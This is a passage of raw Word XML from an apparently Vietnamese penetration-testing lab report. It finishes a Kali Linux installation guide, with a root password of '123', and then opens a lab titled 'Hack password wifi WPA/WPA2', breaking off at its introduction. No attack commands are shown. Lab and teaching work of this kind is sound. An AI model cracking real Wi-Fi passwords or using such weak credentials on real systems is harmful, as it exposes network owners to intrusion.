    <w:p w14:paraId="2CC394D9" w14:textId="7C4649A9"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1D5CF41D">
          <v:shape id="Hình ảnh 38" o:spid="_x0000_i1048" type="#_x0000_t75" style="width:380.25pt;height:284.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId33" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="66321841" w14:textId="6209B183" w:rsidR="00362567" w:rsidRPr="00F12C2B" w:rsidRDefault="00362567" w:rsidP="00362567">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Chọn time zone là “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Eastern</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00B10DD1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>và nhấn continue.</w:t>
      </w:r>
      <w:r w:rsidR="00B10DD1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Bạn có thể thay đổi time zone sau khi setup xong.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD96422" w14:textId="62E364FA"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67C09A11">
          <v:shape id="Hình ảnh 39" o:spid="_x0000_i1049" type="#_x0000_t75" style="width:468pt;height:259.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId34" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E3431E" w14:textId="77777777" w:rsidR="00362567" w:rsidRPr="00F12C2B" w:rsidRDefault="00362567" w:rsidP="00362567">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Bước 6: Cấu hình phân vùng ổ cứng cho hệ điều hành.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5992BCC6" w14:textId="77777777" w:rsidR="00362567" w:rsidRPr="00F12C2B" w:rsidRDefault="00362567" w:rsidP="00362567">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Ở phần này bạn có thể chọn phân vùng tự động là “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Guided – use entire disk</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">” và chọn </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Continue</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D60E0E7" w14:textId="660E578B"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1A69C098">
          <v:shape id="Hình ảnh 43" o:spid="_x0000_i1050" type="#_x0000_t75" style="width:468pt;height:354pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId35" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A0EA1D"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Sau đó chọn ổ cứng phân vùng trống của </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>bạn.Tôi</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> chọn </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SCSI3(0,0,0)(sda) -21.5 GB Vmware,Vmware Virtual S</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>.Sau đó nhấn</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Continue</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10423F78" w14:textId="52915A0F"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0ECC66D3">
          <v:shape id="Hình ảnh 44" o:spid="_x0000_i1051" type="#_x0000_t75" style="width:468pt;height:350.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId36" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="58898568" w14:textId="2F84C411" w:rsidR="00362567" w:rsidRPr="00F12C2B" w:rsidRDefault="00362567" w:rsidP="00362567">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Sau đó chọn </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>All file on partition (recommended for new users)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B10DD1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Chọn </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Continue</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECFC411" w14:textId="0D5EBECD"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345DCBC3">
          <v:shape id="Hình ảnh 45" o:spid="_x0000_i1052" type="#_x0000_t75" style="width:468pt;height:295.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId37" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A19F7B"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Ta chọn </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>finish partitioning and write changes to disk</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> và chọn </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Continue</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7033B0" w14:textId="6B3D4C8E" w:rsidR="00362567" w:rsidRPr="00F12C2B" w:rsidRDefault="00283404" w:rsidP="00362567">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="49DE2BA6">
          <v:shape id="Hình ảnh 46" o:spid="_x0000_i1053" type="#_x0000_t75" style="width:468pt;height:315pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId38" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7BA01B" w14:textId="13629AC4" w:rsidR="00362567" w:rsidRPr="00F12C2B" w:rsidRDefault="00362567" w:rsidP="00362567">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Chọn “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>yes</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>” để xác nhận thực hiện ghi thông tin partition như đã cấu hình xuống ổ cứng.</w:t>
      </w:r>
      <w:r w:rsidR="00B10DD1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Chọn </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Continue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABA1C59" w14:textId="56B1B2B1"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550C5F52">
          <v:shape id="Hình ảnh 47" o:spid="_x0000_i1054" type="#_x0000_t75" style="width:468pt;height:348.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId39" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DE7BCC" w14:textId="48D81BD5" w:rsidR="00362567" w:rsidRPr="00F12C2B" w:rsidRDefault="00362567" w:rsidP="00362567">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Ở phần network mirror chọn “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Yes</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>” để quá trình cài đặt tìm mirror gần nhất để cài đặt các chương trình với phiên bản mới nhất.</w:t>
      </w:r>
      <w:r w:rsidR="00B10DD1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Nếu bạn chọn “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>No</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">” thì gói chương trình sẽ cài đặt từ đĩa ISO của </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>bạn.Tôi</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> chọn “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>No</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">” và </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Continue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723FDF14" w14:textId="6B665142"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4A48F185">
          <v:shape id="Hình ảnh 49" o:spid="_x0000_i1055" type="#_x0000_t75" style="width:468pt;height:327.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId40" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="175DF549" w14:textId="77777777" w:rsidR="00362567" w:rsidRPr="00F12C2B" w:rsidRDefault="00362567" w:rsidP="00362567">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Bước 7: Cài đặt GRUB Boot loader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A97A9A5" w14:textId="77777777" w:rsidR="00362567" w:rsidRPr="00F12C2B" w:rsidRDefault="00362567" w:rsidP="00362567">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Ta chọn “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Yes</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">” nếu muốn cài đặt </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GRUB boot</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> và chọn Continue chờ quá trình cài đặt kết thúc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7753D44A" w14:textId="17B765C9"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4A8B4A02">
          <v:shape id="Hình ảnh 50" o:spid="_x0000_i1056" type="#_x0000_t75" style="width:462pt;height:259.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId41" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6604014F" w14:textId="25B090EC" w:rsidR="00362567" w:rsidRPr="00F12C2B" w:rsidRDefault="00362567" w:rsidP="00362567">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Ta chọn Device for boot loader installation:/dev/sda.Sau khi chọn ổ cài đặt thành công,</w:t>
      </w:r>
      <w:r w:rsidR="00B10DD1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>tiếp tục Continue và tiến hành chờ tiến trình hoàn tất.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B3193A" w14:textId="692F4723"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7C53718E">
          <v:shape id="Hình ảnh 51" o:spid="_x0000_i1057" type="#_x0000_t75" style="width:420pt;height:315pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId42" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDBA4A1" w14:textId="77777777" w:rsidR="00362567" w:rsidRPr="00F12C2B" w:rsidRDefault="00362567" w:rsidP="00362567">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Bước 8: Sau khi quá trình cài đặt hoàn tắt tiến hành Restart lại máy ảo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6447972B" w14:textId="77777777" w:rsidR="00362567" w:rsidRPr="00F12C2B" w:rsidRDefault="00362567" w:rsidP="00362567">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Tiến hành đăng nhập với user là </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> và mật khẩu là </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>123</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>.Ta được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297F2F01" w14:textId="5759BCF9" w:rsidR="00362567" w:rsidRPr="00F12C2B" w:rsidRDefault="008228FC" w:rsidP="00362567">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="4BBAC664">
          <v:shape id="Hình ảnh 54" o:spid="_x0000_i1058" type="#_x0000_t75" style="width:261pt;height:100.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId43" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3AFFCD" w14:textId="6A23D7BE" w:rsidR="00362567" w:rsidRPr="00F12C2B" w:rsidRDefault="008228FC" w:rsidP="00362567">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="3F9FA258">
          <v:shape id="Hình ảnh 55" o:spid="_x0000_i1059" type="#_x0000_t75" style="width:261.75pt;height:94.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId44" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6574050E" w14:textId="452C36AB" w:rsidR="00362567" w:rsidRPr="00F12C2B" w:rsidRDefault="00283404" w:rsidP="00362567">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="63561E2E">
          <v:shape id="Hình ảnh 53" o:spid="_x0000_i1060" type="#_x0000_t75" style="width:343.5pt;height:261pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId45" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7822A5E0" w14:textId="14FB2CA0" w:rsidR="00362567" w:rsidRPr="00F12C2B" w:rsidRDefault="00362567" w:rsidP="00362567">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Qúa trình cài đặt kali linux đến đây là hoàn tất.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADB2042" w14:textId="6A19E438" w:rsidR="000A1434" w:rsidRPr="00F12C2B" w:rsidRDefault="009815BF" w:rsidP="00EB6477">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:t>CHƯƠNG II:</w:t>
      </w:r>
      <w:r w:rsidR="00E707D0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:t>THƯC HIỆN CÁC BÀI LAB PENTESTER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D36E73" w14:textId="39F41360" w:rsidR="00530B97"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1: </w:t>
      </w:r>
      <w:r w:rsidR="0087631E" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hack password wifi WPA/WPA2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63981972" w14:textId="69625363" w:rsidR="0087631E" w:rsidRPr="00F12C2B" w:rsidRDefault="000A1434" w:rsidP="000A1434">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1 Giới thiệu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F04CE63" w14:textId="7773A50A" w:rsidR="000A1434" w:rsidRPr="00F12C2B" w:rsidRDefault="000A1434" w:rsidP="000A1434">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Wi-Fi viết tắt từ </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Wireless Fidelity</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> hay mạng </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>802.11</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> là hệ thống mạng không dây sử dụng sóng vô tuyến.</w:t>
      </w:r>
      <w:r w:rsidR="00DB405A">
        <w:rPr>
